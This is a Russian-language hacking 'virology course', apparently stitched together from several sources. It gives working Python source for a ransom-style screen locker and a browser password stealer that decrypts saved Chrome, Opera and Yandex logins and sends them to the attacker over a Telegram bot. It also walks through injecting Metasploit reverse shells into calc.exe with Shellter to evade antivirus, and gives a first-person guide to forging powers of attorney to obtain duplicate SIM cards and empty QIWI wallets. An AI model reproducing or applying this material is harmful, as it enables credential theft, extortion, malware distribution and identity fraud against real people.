text=Label(screen,text="HACKER PLACE UNIVERSITY",font="TimesNewRoman 30",fg="#32CD32",bg="#1c1c1c") #тоже самое,что и выше

text1=Label(screen,text="Не перезагружайте компьютер, это удалит вашу систему!",font = "TimesNewRoman 16",fg="red",bg="#1c1c1c") #тоже самое,что и выше l=Label(text=t1me,font="Arial 22",fg="red",bg="#1c1c1c") # так же как и выше,только здесь текст равен переменной(t1me),которая стоит у нас в начале и имеет значение 7200. l1=Label(text="До удаления системы осталось:",fg="white",bg="#1c1c1c",font="Arial 15") #простая надпись как и выше

image

У нас есть кнопка и она должна что-то делать. В нашем случае при нажатии на кнопку будет выполняться проверка на правильность пароля.

До этого мы просто создали переменные с объектами,а теперь эти объекты нужно отобразить/отрисовать на экране.

(используем функцию .place(), которая принимает значения x и y - координаты)


image

В winlock-ерах принято оставлять сообщения с информацией,требованием перевода денег. Я решил, что оставлять текстовое сообщение - слишком банально, и при запуске нашего вируса будет проигрываться голосовое сообщение.

Голосовое сообщение я сделал с помощью этого сервиса - ТЫК. Музыка/сообщение должно быть в формате .wav, можно использовать конвертеры.


image

Дальше мы должны обновить наш экран и выполнить нажатие на поле для ввода


image

image

Теперь мы должны запустить цикл, который будет работать,пока от пользователя мы не получим правильный пароль.


Компилируем в exe


При запуске программы(F5) все будет работать, но распространять код и установщик питона, это явно не лучший вариант. Поэтому мы наш код скомпилируем в exe файл. Для этого мы через pip установить специальную программу. Смотрим видео.

Видео - https://vimeo.com/268746629

После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами

-F соберет все файлы в один exe файл

-w отключит консоль

-i *путь к иконке* аргумент,который подключит к программе иконку Смотрим видео.

Видео - https://vimeo.com/268746885

После в папке dist появится наш код скомпилированный в EXE. У него есть 2 минуса.


  1. Большой вес, исправить можно удалив голосовое сообщение и заодно отключить импорт pygame.

  2. Долгий запуск, это происходит из за сбора всех файлов в один. Наш exe можно назвать архивом, который распаковывается в временную папку. Этого можно избежать не собирая все в один файл.


    !!!ВАЖНО если вы добавили голосовое сообщение и скомпилировали программу, файл с звуком(message.wav) должен лежать рядом с EXE иначе программа крашнется.


    Вот мы и написали наш простой локер, да диспетчер задач и комбинации alt+tab будут работать, но из-за постоянных кликов - убить процесс практически невозможно. Наш вирус не будет палится антивирусами, ведь им не на что реагировать. В нашей программе нету взаимодействия с системой пользователя.


    НЕБОЛЬШОЙ СЛОВАРЬ ТЕРМИНОВ:


    IDLE/IDE среда для разработки программного обеспечения.

    Библиотека/модуль - написанные коды/функции,которые подключаются к нашей программе.

    pip - система для установки пакетов(Для Python).

    Переменная - ячейка в памяти,которая имеет свое уникальное название и может хранить определенную информацию

    Функция - часть кода, который имеет свое уникальное название по которому его можно запустить/вызвать

    Цикл - действие, которое будет повторятся N-ное количество раз и может зависит

    Продолжая курс вирусологии мы напишем стиллер на Python. Погнали!

    Переходим на официальный сайт PythonА - ТЫК. Скачиваем последнюю версию и устанавливаем ее.


    image

    Суть работы стиллера:

    Программа проверит наличие папок от указанных браузеров, при наличии - подключится к базе данных(LoginData) и достанет от туда сохраненные логины,пароли от сайтов. После полученные данные программа отправит от имени бота в чат телеграм. Вот и все.


    Создадим своего бота

    Как по мне, очень удобно при частом пребывании в телеграме получать в личные сообщения логи со стиллера. Поэтому мы создадим своего бота, который будет нам отправлять украденные логины и пароли.

    Для начала мы должны создать нашего бота, в этом нам поможет @BotFather, запускаем с ним диалог и создаем нового бота,которому мы должны придумать имя с окончанием "_bot". После BotFather выдаст нам token для управления нашим ботом.

    /start

    /newbot


    После всех вышеперечисленных действий мы должны перейти по ссылке, отправить

    боту любое сообщение с нужного вам аккаунта и обновить открытый сайт, в итоге мы

    image

    получим кучу разных данных, в которых нам нужно найти и сохранить chat id.

    https://api.telegram.org/botВашToken/getUpdates #перейти по данной ссылке "chat":{"id":вашid #найти chatid в информации


    С ботом мы разобрались, идем дальше.


    Начинаем кодить

    Сначала нам нужно установить библиотеки, которые будут использованы в нашей программе

    Для этого запустим терминал(cmd) и обновим питоновский установщик пакетов.

    pip install --upgrade pip


    Видео - https://vimeo.com/268746629


    После обновления установим 2 нужные нам библиотеки: pyTelegramBotAPI pywin32 и

    telebot.


    image

    В самом начале программы, мы должны подключить библиотеки, которые мы будем использовать в нашем коде.


    image

    Теперь нам нужно задать переменные, которые мы будет использовать.


    image

    Дальше мы должны создать переменные,списки с директориями возможных браузеров.

    op3ra = "C:\\Users\\" + name_0f_user + "\\AppData\\Roaming\\Opera Software\\Opera Stable\\" + "Login data"

    #переменная op3ra которая равна такому пути C:\\Users\\Users\\AppData\\Roaming\\Opera Software\\Opera Stable\\LoginData - где Login Data - база данных, а остальное - путь к папке браузера.

    g00gle = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" + "Login Data" #также как и выше

    yand3x = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\" + "Login Data" #также как и выше

    c0m0d0drag0n = "C:\\Users\\" + name_0f_user + "\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\" + "Login Data" #также как и выше lsdir=[op3ra,g00gle,yand3x,c0m0d0drag0n] #создаем список в котором хранятся наши переменные с директориями браузеров.

    lsbr0wser=["Opera","Google Chrome","Yandex Browser","Comodo Dragon"] #создаем список с названиями браузеров, которые у нас есть. Названия расположены в порядке списка lsdir


    Я добавил только 4, как по мне самых распространенных браузеров. Вы можете сами добавлять другие браузеры на движке Chromium.

    При добавлении/редактировании директорий, нужно использовать двойной, обратный слэш(\\), иначе будет выбивать ошибку,связанную с кодировкой.

    Теперь приступим к расшифровке паролей и отправке полученных данных в телеграмм:

    b0t.send_message(ваш id, "Компьютер: " + name_0f_user) #для начала мы отправим в чат имя системы жертвы #b0t - имя бота,которого мы создали в начале

    #send_message - функция для отправки сообщения,которая принимает такие аргументы: id чата,который мы получили ранее и текст,который мы желаем отправить, в данном случае, слово "Компьютер:" объединенное с переменой name_0f_user

    for i in range(len(lsdir)): #запускаем цикл, который будет длится от переменной i до длины списка lsdir, от 0 до 4

    try: #попробовать сделать следующие действия, если не получится, то выполнить действия после except br0wser=lsdir[i] #переменной br0wser присвоим элемент списка под номером [i]

    connecti0n = sqlite3.connect(br0wser) #начинаем работу с sqllite, создаем переменную, которая равняется подключению базы данных, которая находится по адресу br0wser

    curs0r = connecti0n.cursor() #создаем переменную curs0r, которая отвечает за создание объекта для взаимодействия с базой данных

    curs0r.execute('SELECT origin_url, username_value, password_value FROM logins') #переменной curs0r мы говорим достать из базы данных нам такие значения - origin_url(ссылка на сайт где был введен логин и пароль),username_value(логин), password_value(пароль)

    for ii in curs0r.fetchall(): #создаем цикл, который будет длится от нуля(ii), до всех значений, которые можно получить из базы данных(curs0r.fetchall)

    d3cryptpass = win32crypt.CryptUnprotectData(ii[2]) #переменной d3cryptpass присваиваем значение расшифровки пароля(второго элемента в списке значений, добытых из базы данных), функцией CryptUnprotectData(библиотека win32crypt)

    b0t.send_message(id_вашего_чата, lsbr0wser[i]) #в чат от имени бота отправляем сообщение с i-тым элементом из списка текстовых названий браузеров.

    b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением

    b0t.send_message(id_вашего_чата, "Сайт: " + ii[0]) #в чат от имени бота отправляем слово "сайт"

    + нулевой элемент в списке

    b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением

    b0t.send_message(id_вашего_чата, "Логин: " + ii[1]) #в чат от имени бота отправляем слово "логин" + первый элемент в списке

    b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением

    d3cryptpass=str(d3cryptpass) #переменной d3cryptpass- присваиваем значение d3cryptpass, только переводим ее в текстовый тип данных(str)

    b0t.send_message(id_вашего_чата, "Пароль: " + d3cryptpass) #в чат от имени бота отправляем слово "пароль" + переменную d3cryptpass

    b0t.send_message(id_вашего_чата, "----------------------------") #отправляем от имени бота сообщение в чат с разделительной линией/украшением

    except: #если действие после try не заработало/выдало ошибку, то выполнить действие после except b0t.send_message(id_вашего_чата,"Браузер " + lsbr0wser[i] + " был запущен, или не установлен") #в чат

    от имени бота отправляем слово "браузер" + i-тый элемент в списке с названиями браузеров(lsbr0wser) + сообщение об ошибке


    Теперь я попытаюсь объяснить суть вышеописанного кода на "простом" примере) Жертва запускает наш стиллер, программа пробует(try) пройтись по нулевому[i] элементу в списке и подключится к базе данных,если у нее это получается, то она собирает данные и отправляет в чат телеграм, если что-то не получается, то программа не крашится, а выполняет действие указанное(except) в случае ошибки. Дальше программа проходит второй круг(при втором круге счетчик i увеличивается на один), но уже по первому[i] элементу в списке и выполняет все как и раньше. Так будет происходить, пока работает цикл, а он работает от нуля[i] до длины списка с директориями.


    Компилируем в exe


    Ясное дело, что python скрипт мы не будем распространять, поэтому мы скомпилируем его в exe файл. Для компиляции нам нужно будет установить специальную утилиту pyinstaller для компиляции py в exe


    Видео - https://vimeo.com/268746885

    pip install pyinstaller


    После установки мы должны открыть папку с нашей программой на питоне и запустить pyinstaller с такими аргументами

    -F соберет все файлы в один exe файл

    -w отключит консоль

    image

    -i *путь к иконке* аргумент,который подключит к программе иконку


    После в папке dist появится наш код скомпилированный в EXE. У меня готовый стиллер запускается за 5 секунд и имеет вес в 6 мегабайт.


    image

    Так приходят логи, пароль находится между символом b' и '


    Вот мы и написали наш простой стиллер, мы смогли уложится в 34 строчки кода. Надеюсь вам все было понятно, пытался писать как можно проще..

    image


    Большая проблема многих начинающх хакеров в том, что «заряженные» исполняемые файлы, созданные с помощью Metasploit или других фреймворков, палятся практически всеми антивирусными вендорами. И поэтому вместо того, чтобы продолжать проникновение, хакеру приходится думать, как обмануть антивирус. Проделывая эту работу от кейса к кейсу, очень много времени теряешь впустую. Поэтому постепенно начали появляться инструменты, автоматизирующие эту задачу Сегодня мы познакомимся с другим крутым инструментом по имени Shellter.

    Начнем!

    Для начала немного информации с официального сайта проекта. Значит, так, Shellter — это инструмент для динамического внедрения шелл-кода, да и вообще первый инструмент для динамического внедрения кода в PE-файлы (но стоит сразу отметить, что DLL-файлы не поддерживаются). Применяется для встраивания шелл-кода в нативные Windows-приложения (пока поддерживаются только 32-битные). В качестве полезной нагрузки могут выступать собственные шелл-коды или же сгенерированные с помощью какого-либо фреймворка, например Metasploit. Преимущество Shellter в том, что в своей работе он опирается только на структуру PE-файла и не применяет никаких «грязных» приемов, таких как добавление новых секций с RWE-правами, модификация прав доступа к существующим секциям и прочие вещи, которые сразу же вызывают подозрение у любого антивируса. Вместо этого Shellter использует уникальный динамический подход, основанный на потоке выполнения целевого (заражаемого) приложения.

    ОСНОВНЫЕ ФИЧИ

    Нельзя не привести довольно внушительный список возможностей, основные из которых (наиболее интересные) рассмотрим в сегодняшней лекции.

Все это адаптированные пейлоады из Metasploit, поэтому они очень хорошо известны всем антивирусам. В связи с чем настоятельно рекомендуется включить шифрование полезных нагрузок с помощью опции --encode. В случае использования режима Auto без каких-либо аргументов Shellter применит свое собственное шифрование для сокрытия полезной нагрузки.

Задействовать определенный пейлоад можно из командной строки, например так:


image

или так:


image


STEАLTH-РЕЖИМ

Очень интересная фишка инструмента — опция Steаlth Mode. Дело в том, что она позволяет внедрять в один файл несколько полезных нагрузок. Включив данную опцию (а включается она с помощью ключа --steаlth или просто -s), можно будет повторно заразить тот же самый файл другим пейлоадом. То есть можно будет заинжектить meterpreter_reverse_tcp, meterpreter_reverse_https и какой-нибудь свой пейлоад, и при запуске зараженного приложения выполнятся все три нагрузки.

Важно: при использовании Stealth-режима с кастомным пейлоадом (то есть не встроенным в Shellter) надо будет установить exit-функцию в значение THREAD. В противном случае, если сессия умрет или ты захочешь ее закрыть, упадет все приложение. Плюс к этому все reverse connection пейлоады из Metasploit делают ограниченное число попыток соединиться с удаленным хостом, исчерпав которые убивают процесс. Чтобы этого не произошло, Shellter использует слегка измененные версии пейлоадов из Metasploit. Поэтому, когда тебе понадобится reverse connect, лучше воспользоваться встроенными в Shellter образцами.


РАЗБИРАЕМ НА ПРИМЕРАХ

На самом деле есть еще много интересных моментов, изложенных в официальной документации, но в рамках данной статьи они для нас не очень существенны. Как говорится, лучше один раз увидеть, чем сто раз услышать. Именно поэтому перейдем от слов к делу и проверим инструмент в реальных условиях. Начнем с установки. Все, что требуется пользователям

Windows, — скачать и распаковать архив. Как уже упоминалось, Shellter можно использовать и в Linux/Mac. Можно скачать упомянутый архив и запустить инструмент через Wine/CrossOver. Хотя пользователи некоторых дистрибутивов Linux могут установить Shellter и с помощью менеджера пакетов. Например, в Kali установка не отличается от установки прочего софта:


image


CALC.EXE, НАСТАЛО ТВОЕ ВРЕМЯ

Далее для экспериментов нам понадобятся две виртуальные машины, объединенные в сеть: одна с Windows (в данном случае будет использоваться XP, так как она уже установлена и настроена), где мы будем

«заражать» приложение, вторая с Kali Linux — для того, чтобы взаимодействовать с reverse connection пейлоадами. Остается только определиться с пациентом, которого будем заражать. Каким критериям он должен удовлетворять, мы уже обсудили. Поэтому повторяться не будем, а для опытов выберем многострадальный калькулятор.


WINEXEC

Начнем с самого простого — попытаемся внедрить в калькулятор WinExec пейлоад, который будет запускать... блокнот. Для этого скопируем калькулятор в папку с Shellter (чисто ради удобства работы) и запустим последний. Нам сразу же будет предложено выбрать режим работы: автоматический (Auto) или ручной (Manual). Чтобы познакомиться со всеми опциями, выберем ручной (m) и укажем в качестве таргета calc.exe. После чего Shellter создаст резервную копию оригинального файла (calc.exe.bak) и начнет собирать информацию о нем и проводить необходимые изменения. Прежде всего он проверит, не упакован ли исполняемый файл (почему следует избегать внедрения шелл-кода в упакованные файлы, мы говорили выше). Потом немного поработает над самим файлом, а конкретно над его DllCharacteristics и цифровой подписью. Затем спросит, стоит ли собирать Dinamic Thread Context Info. В дальнейшем мы будем использовать эту информацию в качестве ключа для дешифровки пейлоада, чтобы не хранить его в явном виде (помнишь Dinamic Thread Context Keys?). Поэтому отвечаем утвердительно. Количество инструкций задаем произвольно. Для примера

установим равным 15 000. Чтобы не наколоться и не внедрить шелл-код в место, где живет самомодифицирующийся код, включаем проверку на его наличие во время трассировки. Чтобы сэкономить время, останавливать трассировку при его обнаружении не будем, о чем и сообщим инструменту на следующем шаге. Real-Time Tracing покажет процесс прохождения программы в реальном времени, но никакой важной информации для нас это не несет, так что включать не будем. Далее Shellter применит свои немногочисленные (пока) средства по борьбе с антиотладочными приемами и начнет выполнять трассировку калькулятора. По истечении которой задаст важный вопрос: стоит ли включать Stealth Mode? В принципе, даже если мы не планируем внедрять в файл несколько пейлоадов, данная опция не помешает, так что включим. После этого нам предложат выбрать между встроенными и кастомными пейлоадами (о них поговорим далее).

Выбираем встроенные и в предоставленном списке останавливаем свой выбор на кандидате номер семь — WinExec. В качестве аргумента указываем ему notepad.exe. И вот тут-то нас спросят, стоит ли зашифровывать пейлоад с помощью DTCK (Dinamic Thread Context Keys). Давай попробуем, плюс на следующем шаге согласимся еще и на обфускацию декодера. Shellter поищет в таблице импорта подходящие API для этой задачи, в нашем случае найдет только LoadLibrary/GetProcAddress связку (идет под номером 5). Затем обфусцируем IAT Handler и добавляем полиморфный код (встроенный, размер устанавливаем в 200 байт). После этого можно будет посмотреть и выбрать конкретную точку для внедрения шелл-кода. В данном случае доступен ди

апазон от 0 до 560 (для внедрения была выбрана первая). Это последний вопрос на выбор, далее Shellter проинжектит шелл-код и пересчитает контрольную сумму файла. В общем, весь процесс чем-то напоминает установку программы: Next, Next, Next, и все готово. Остается только запустить полученный файл. Как и было задумано, помимо калькулятора, появилось еще и окно блокнота.

image


CUSTOM PAYLOAD

Теперь немного отвлечемся и посмотрим, что делать, если вдруг встроенных в Shellter пейлоадов не хватает для решения какой-либо задачи. Если помнишь, мы говорили, что утилита позволяет использовать кастомные пейлоады, сгенерированные юзером. Поэтому идем, открываем Metasploit и выбираем подходящий нам по функциональности вариант:


image

Допустим, нас интересует windows/meterpreter/bind_hidden_ipknock_tcp:


image

Смотрим опции:

image


Прежде всего обращаем внимание на параметр EXITFUNC, выше уже говорилось, что его значение должно быть thread.


image

И настраиваем остальные параметры под себя:


image

Теперь смотрим параметры генерации пейлоада:

image

И генерируем пейлоад:


image

После чего файл с именем custom_payload должен появиться в домашней директории. Переносим его на машину с Shellter.


STEALTH MODE

Теперь займемся Stealth-технологией и попытаемся внедрить в калькулятор сразу несколько пейлоадов. Первый будем использовать встроенный, а второй — лично сгенерированный. Запускаем Shellter в автоматическом режиме (чтобы побыстрей), указываем как цель calc.exe и ждем, когда нам предложат включить Stealth Mode. Включаем и выбираем в качестве полезной нагрузки Meterpreter_Reverse_TCP. Устанавливаем LHOST = 192.168.0.55 (адрес Kali-машины), LPORT = 4444. На этом все, далее инструмент делает все самостоятельно и сообщает об успешном внедрении. Отлично, давай проверим работоспособность. Идем в Kali и открываем Metasploit:

image


А затем на соседней виртуальной машине запускаем зараженный калькулятор. И получаем:


image

Все замечательно работает. Теперь попытаемся запихнуть в calc.exe еще одну полезную нагрузку, которую сгенерировали на предыдущем шаге. Опять запускаем Shellter в автоматическом режиме и доходим до шага выбора пейлоада, только на этот раз указываем, что будем использовать кастомный. На вопрос, является ли нагрузка reflective dll loader, отвечаем отрицательно и ждем, когда Shellter доделает свое дело. Теперь у нас в калькуляторе должно прятаться две нагрузки: meterpreter/reverse_tcp и meterpreter/bind_ hidden_ipknock_tcp. Проверим, так ли это. Заходим в Metasploit и повторяем указанные выше действия. Ничего удивительного, reverse_tcp отработала, как положено. А вот второй пейлоад более интересный, чтобы подключиться к нему, надо сначала постучать в порт 5555 Windows-машины с адреса 8.8.8.8. Иначе подключиться не получится.

Сделать это можно, проспуфив IP-адрес с помощью утилиты hping3:


image

Подождать немного и попытаться подключиться. Сначала отправляем активную сессию (ту, которая reverse_tcp) meterpreter в бэкграунд:

image

Выбираем другой пейлоад — meterpreter/bind_tcp — и выставляем опции:


image

И получаем еще одну meterpreter-сессию. Как видишь, несколько пейлоадов в одном файле прекрасно уживаются. Вот и замечательно.


image


image

ЗАКЛЮЧЕНИЕ

Первое знакомство с Shellter закончилось. Все основные и интересные моменты мы рассмотрели, так что у тебя теперь достаточно информации для полноценного использования этой тулзы. А в качестве домашнего задания можешь самостоятельно проверить, как «хорошо» детектируют антивирусы полученные после внедрения полезной нагрузки файлы.

image


Какой взлом обходится без социальной инженерии? Социотехнический взлом в наше время стал совершенно обычным делом. В этом разделе мы обучим тебя социальной инженерии и ее тонкостям, научим ее применять. Расскажем о техниках, которые идут в ход, и о разнообразных тонкостях, которых в деле хакера — великое множество.


Социальная инженерия, иногда называемая наукой и искусством взлома человеческого сознания, становится все более популярной в связи с повышением роли социальных сетей, электронной почты или других видов онлайн-коммуникации в нашей жизни. В сфере информационной безопасности данный термин широко используется для обозначения ряда техник, используемых киберпреступниками. Последние имеют своей целью выманивание конфиденциальной информации у жертв либо побуждают жертв к совершению действий, направленных на проникновение в систему в обход системы безопасности.

Даже сегодня, когда на рынке доступно огромное количество продуктов для обеспечения информационной безопасности, человек все еще владеет ключами от всех дверей. Будь то комбинация учетных данных (логин и пароль), номер кредитной карты или данные для доступа к онлайн-банку, самое слабое звено в системе обеспечения безопасности — это не технологии, а живые люди. Таким образом, если злоумышленники применяют к пользователям манипулятивные психологические техники, очень важно знать, какие приемы наиболее характерны в данной ситуации, а также понимать принцип их работы, чтобы избежать неприятностей.

Социальная инженерия — понятие совсем не новое, оно появилось давным- давно. Известными специалистами-практиками в этой науке стали, например, Кевин Митник и Фрэнк Абаньяле, которые на сегодняшний день являются ведущими консультантами по безопасности. Они живая иллюстрация того, что преступники могут превращаться в уважаемых экспертов. К примеру, тот же Фрэнк Абаньяле был одним из самых знаменитых и виртуозных мошенников: он умел создавать множество личностей, подделывать чеки и обманывать людей, вытягивая из них конфиденциальную информацию, необходимую для работы мошеннических схем. Если вы смотрели фильм «Поймай меня, если сможешь», вы имеете представление о том, на что способен специалист по социнженерии, если он имеет перед собой ясную цель. Вам просто следует помнить, что для получения от вас нужной информации социнженер может использовать

различные мошеннические схемы, не ограничивающиеся приемами, связанными с технологиями или компьютерами, так что лучше пользователям с осторожностью относиться к подозрительным действиям, даже если они кажутся обычными. Классическим приемом, например, является выманивание пароля в телефонном звонке. Кажется, что никто в здравом уме не сообщит свой пароль постороннему, но звонок «с работы» в 9 утра в воскресенье, требующий приехать для какой-то мелочевой технической операции над вашим компьютером, несколько меняет дело.

Когда «ваш администратор» предложит просто сказать ему пароль, чтобы он все сделал за вас, вы не только сообщите пароль, но и поблагодарите его за заботу! Ну, может, не лично вы, но примерно половина ваших коллег поступит так гарантированно.

Большинство киберпреступников не станут тратить время на осуществление технологически сложных приемов взлома, если необходимые сведения можно получить, используя навыки в области социнженерии. Более того, существует множество сайтов, где описаны принципы работы подобных техник и причины их успеха. Один из этих сайтов

называется SocialEngineer.org, и он предлагает весьма полезную основу для теоретического изучения принципов социнженерии, дополняя ее большим количеством реальных примеров.

Мы используем речь каждый день, влияя на действия друг друга, хотя часто не замечаем этого. Но язык с точки зрения социнженерии имеет несколько недостатков, так как он связан с нашим субъективным восприятием фактов, при котором мы можем опустить некоторые части истории, исказить смысл или сделать некоторые обобщения. НЛП, или нейролингвистическое программирование, которое изначально было создано для лечебных целей, сегодня считается «мутировавшей» формой гипноза, используемой социнженерами как инструмент манипуляции жертвами и оказания на них влияния с целью побудить их выполнить действия, ведущие к успеху атаки. В результате данной тактики жертва может сообщить свой пароль, разгласить конфиденциальную информацию, отказаться от какой-либо меры обеспечения безопасности, то есть, может сделать все что угодно, чтобы убрать препятствия на пути злоумышленников.

Хотя связь между психологией и хакингом кажется чересчур натянутой, на самом деле онлайн-атаки основаны на тех же принципах, которые лежат в основе «офлайнового» мошенничества. Принцип возвратности («если я окажу тебе услугу, ты окажешь услугу мне»), принцип социальной проверки (вы оцениваете свое поведение как правильное, если наблюдаете такое же поведение у большинства), преклонение перед авторитетами (проявление большей степени доверия к сотруднику полиции, врачу, сотруднику технической поддержки, кому-либо более «высокого ранга») — это универсальные для всех способы выстраивания общения в социуме и

удовлетворения наших базовых социальных инстинктов. Социнженер знает, на какие кнопки нажимать, чтобы получить желаемый ответ, создавая контекст (канву) для формирования правдоподобной легенды, которая смогла бы создать ощущение срочности. Для опытных специалистов в сфере социнженерии не составит труда обойти рациональное мышление человека, и им понадобится только доля секунды, чтобы добиться преимущества и получить от жертвы необходимые данные.

Однако в данной статье мы в большей степени обратим внимание на различные техники, используемые онлайн-мошенниками для незаконного получения информации и прибыли от жертв, которые «хотели как лучше». Как мы уже упомянули, принципы, используемые для мошеннических схем в Интернете, похожи на те, которые используются в реальной жизни, но так как Интернет — это огромная машина распространения информации, одно фишинговое сообщение может быть отправлено миллионам получателей в течение самого короткого времени. То есть в таких условиях данный тип атак может превратиться в беспроигрышную лотерею: даже если только небольшая часть от общего числа потенциальных жертв попадется на удочку, это все равно означает огромную прибыль для организации или человека, стоящего за атакой.

Сегодня одним из самых распространенных методов получения конфиденциальной информации является фишинг (термин образован от игры слов password harvesting fishing — «ловля паролей»). Фишинг можно охарактеризовать как тип компьютерного мошенничества, который использует принципы социальной инженерии с целью получения от жертвы конфиденциальной информации. Киберпреступники обычно осуществляют свои действия при помощи электронной почты, сервисов мгновенных сообщений или SMS, посылая фишинговое сообщение, в котором напрямую просят пользователя предоставить информацию (путем ввода учетных данных в поля сайта-подделки, скачивания вредоносного ПО при нажатии ссылки и т.д.), благодаря чему злоумышленники получают желаемое при полном неведении со стороны жертвы.

Мы наблюдали процесс развития вредоносного ПО, который во многом использовал принципы социнженерии. Раньше факт заражения компьютера вирусом был весьма очевиден: пользователь видел странные сообщения, иконки, картинки — одним словом, все, что обнаруживало участие злоумышленника. Сегодня нас уже не удивляют примеры вредоносного ПО, которое получает доступ к системам жертв путем применения трюков, характерных для социнженерии, и остается невидимым для пользователя до того момента, как выполнит свою задачу. Бесконечная игра в кошки-мышки между хакерами и компаниями, создающими средства информационной безопасности, подтверждает: образование и информирование — это ключевой защитный механизм, необходимый для пользователей. Они

должны следить за новостями и новыми веяниями в мире информационной безопасности, а также знать о ключевых тактиках мошенников.

Множество интересных примеров взлома основаны на техниках социнженерии, которые, в свою очередь, помогают злоумышленникам доставить вредоносное ПО жертвам. Среди наиболее популярных — фальшивые обновления Flash Player и других популярных программ, вшитые в документ Word исполняемые файлы и многое другое.


Большинство описанных выше методов проведения атаки направлены на жителей Латинской Америки, так как технологические угрозы такого типа не до конца понятны или распространены в регионе, а если еще и принять во внимание, что большинство компьютеров работают с устаревшим ПО, это дает киберпреступникам отличную возможность заработать. Только недавно некоторые банки усилили меры обеспечения информационной безопасности для пользователей онлайн-банкинга, но до сих пор множество уязвимостей в системе безопасности способствуют успеху тактик социнженерии. Интересно, что многие особенности этого региона перекликаются с российскими, поэтому киберпреступники СНГ и Латинской Америки весьма активно обмениваются опытом и перенимают друг у друга удачные находки.

Популярны другие типы атак, которые даже не всегда попадают в категорию компьютерного мошенничества. Схема, известная как «виртуальное похищение«, использует практики социнженерии, а в качестве средства связи выступает телефон. Злоумышленники обычно звонят жертве и говорят, что член семьи был похищен и для его освобождения требуется незамедлительно заплатить выкуп. Преступник создает ощущение срочности и страха, жертва выполняет требования мошенника, даже не убедившись, на самом ли деле похищен кто-то из родственников. Похожая схема популярна при атаках на пожилых людей и может быть названа «виртуальной болезнью» — когда жертве звонят якобы из поликлиники, говорят, что в недавних анализах есть признаки опасного заболевания и нужно незамедлительно лечь на операцию для спасения жизни, разумеется, платную. После оплаты, конечно, никого не оперируют, потому что болезни никакой и не было.


Давайте продолжим нашу лекцию интереснейшими примерами социальной инженерии. Они наверняка вас удивят и дадут идеи и понимание.

«Взлом QIWI»


Способов заработка в интернете довольно много, но все они либо неэффективные, либо же «черные». Мы никогда не приветсвуем злодеяния и кражу у честных людей. Однако, в деньгах заинтересованы. Обчистить мошенника в интернете казалось не таким уж и черным делом.


Во времена рассвета синтетических наркотиков открывались целые форумы по продаже и закупке наркотических средств. Дилеры нуждались в особой защите, но их каналы были не такими уж и защищенными. Как правило, общение с клиентами проводилось через уязвимые мессенджеры вроде skype, jabber и старой доброй icq. Оплату дилеры принимали в основном на самые популярные платежные системы, но в основном на Киви-кошелек по номеру телефона. На балансе таких кошельках находились и находятся огромные деньги. Получить доступ к кошельку Киви -означает получить эти самые деньги. Наркодилеры не принимают никаких файлов, не переходят по внешним ссылкам, стараются не вступать в тесный контакт с клиентом. Все, что мы имеем, это номер кошелька Киви.

Доверенность


Техническая поддержка Киви скептически относилась к восстановлению доступа к кошельку. Если вы потеряли доступ, то восстановить пароль можете только если сим карта у вас на руках. Тогда мы и стали думать, как получить себе дубликат сим-карты. Первым шагом, мы звонили оператору сотовой связи и пытались каким-либо образом переадресовать смс- сообщения и звонки на свой номер, что окончилось неудачей. Но мы выяснили, что на основе генеральной доверенности, все-таки, можно получить дубликат сим-карты. Однако этот способ был очень опасным и сложным.

Суть состояла в том, чтобы пробить паспортные данные человека, зарегистрированного на сим-карту. Затем найти человека, на кого можно будет оформить генеральную доверенность. После чего этот человек должен будет прийти в отделение сотовой связи и получить сим-карту. Но для составления генеральной доверенности нужен еще и второй человек, которому принадлежит сим-карта, поэтому идея показалась напрасной.

Однако, мы все же решили проверить на себе. У моего знакомого была генеральная доверенность на своего родственника. Мы пришли в отдел и были поражены тем, что операторы никак не проверяли данную доверенность на наличие в реестре, а, значит, можно указать совершенно несуществующего нотариуса и нарисовать любую печать. Грубо говоря, документ можно полностью подделать без участия жертвы.

На хакерских форумах были люди, активно предлагающие свои услуги по пробиву* информации о любом мобильном номере. Стоимость была сравнительно низкая, поэтому мы и воспользовались этим. Получив номер кошелька для оплаты наркотических средств от дилера, мы передали его пробивале**. По сути, это те же операторы в мобильных офисах. Через час получили паспортные данные этого номера. Взяли за основу шаблон генеральной доверенности, ранее использованной моим знакомым.

Переписали данные, переделали печать и ФИО нотариуса. Поставили другую подпись и все готово. Придя в офис к оператору, было весьма тревожно, но действовали, не подавая виду. Покрутив свежую напечатанную доверенность в руках, оператор без лишних вопросов оформил на новые паспортные данные сим-карту и выдал нам в руки в течение 5 минут. Слишком уж просто. Мы сразу же отправили код восстановления пароля на сайте киви и восстановили пароль за минуту. Работали мы так очень долго и это приносило огромные деньги.


Однажды операторы заподозрили частые посещения в офис и решили проверить доверенность. Все обошлось и нам удалось уйти. По этой схеме можно работать, если соблюдать особые меры предосторожности. Во- первых, необходимо было посещать разные офисы с периодичностью примерно 1-2 раза в неделю. Во-вторых, люди должны постоянно меняться. Причину, по которой мы восстанавливали сим-карты, операторы не спрашивали. Их мало волновал и сам документ. Они даже не делали скан- копию. Все эти ошибки были результатом безответственного отношения работников офисов.



ПРЯМАЯ АТАКА: ПРОСТО ПОПРОСИ


Хотите узнать чей-нибудь неопубликованный номер телефона? Социальный инженер может сообщить вам полдюжины способов, но, возможно, самым простым из них будет обычный телефонный звонок, как этот, который мы рассмотрим.


Номер, пожалуйста

Атакующий позвонил по неофициальному номеру телефонной компании, в механизированный центр назначения линий (Mechanized Line Assignment Center). Он сказал женщине, поднявшей трубку:

«Это Пол Энтони, кабельный монтер. Послушайте, здесь загорелась распределительная коробка. Полицейские считают, кто-то пытался поджечь собственный дом, чтобы получить страховку. Я остался здесь заново монтировать целый терминал из двухсот пар. Мне сейчас очень нужна помощь. Какое оборудование должно работать по адресу Саут-Мэйн (South Main), 6723?»

В других подразделениях компании человек, которому позвонили, должен знать, что сведения о неопубликованных номерах предоставляются только уполномоченным лицам. Предполагается, что о центре известно только

